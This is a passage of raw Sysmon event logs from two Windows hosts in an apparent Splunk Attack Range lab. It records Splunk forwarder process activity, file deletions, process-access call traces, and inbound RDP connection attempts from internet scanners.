23542300x800000000000000050954Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:59.807{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B7C90D67BD5232633E64BB0F7FDFB3E,SHA256=094AABEC04875A3DC0800F9C32D7A5FB21E8EBE3B446D231653CF7B86802397D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050953Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:59.651{85C0FFC9-B7ED-607E-1100-00000000BB01}1000NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=1618442F71C11D2C0AE3D14E3AF81B82,SHA256=FE5CB5E6CB38E3082845BD3A525223EF1A9347D4D54EA5E350F18945C06B4C44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050952Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:59.370{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CA13638AE58E81200183ADA7651A3645,SHA256=EDEBA60DBA3B3B5AD6AC60197BC81CE9F55CC51E22D6B0837A93735A90681DA1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050951Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:57.023{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51923-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050950Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.569{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59489-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000082217Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:00.855{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E89486D654F246A3681B7C4729129033,SHA256=05E17706F72BBF257A81F0B1A41E7935216D7B8B7B20270F140EDE8460574386,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082216Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:00.058{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=449BF75E1DA2FCCF453557FAF7A24D22,SHA256=98179032985BD813D9715D253E197C605DEDE4B2FFD4F61AB2BFF93E20704355,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082215Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:58.326{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com65060-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000050969Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:00.839{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=492D9BC0C60E271E8C735B69CAAB9F0E,SHA256=8D9AF80419F19E0FF22C65A97DF87FBCD5A5311AF98718DE4508E08542451058,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050968Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:00.573{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3BE369D95DB749C803C65B8118744F4F,SHA256=67CF66D428E3FA3B8D28F6EEE0D9A1A2C965088570B50C5D011DE003A198563D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000050967Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:00.042{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EC70-607E-FD06-00000000BB01}2716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050966Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:00.042{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050965Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:00.042{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050964Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:00.042{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050963Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:00.042{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050962Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:00.042{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050961Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:00.042{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050960Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:00.042{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050959Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:00.042{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050958Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:00.042{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050957Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:00.042{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EC70-607E-FD06-00000000BB01}2716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050956Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:00.042{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EC70-607E-FD06-00000000BB01}2716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050955Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:00.042{85C0FFC9-EC70-607E-FD06-00000000BB01}2716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000082224Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:01.996{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EC71-607E-6F0F-00000000BB01}2308C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082223Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:01.997{A7A01FEF-EC71-607E-6F0F-00000000BB01}2308C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082222Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:01.277{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38E915EE982998DE2A57CA19FD3B08CC,SHA256=123D7793F0415BECEEDDD30ABCAA6E1AD2D3EE913E8E919C0359B1939FCA596A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082221Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:59.865{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-48048-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082220Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:59.726{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50772-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082219Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:59.611{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal52556-false10.0.1.14win-dc-339.attackrange.local49676- 354300x800000000000000082218Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:59.232{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57664-false10.0.1.12-8089- 23542300x800000000000000050973Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:01.870{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9817608951118DEDBA3E304ABF40531D,SHA256=2B9A4FEE5348A28423252C810BAA16DF741D2F6E41A5D4D2E8CBE5C005455FFB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050972Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:59.168{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52556-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x800000000000000050971Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:58.601{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53395-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050970Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:58.442{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50462-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000082242Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:02.808{A7A01FEF-EC72-607E-700F-00000000BB01}62725836C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082241Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:02.652{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EC72-607E-700F-00000000BB01}6272C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082240Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:02.652{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082239Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 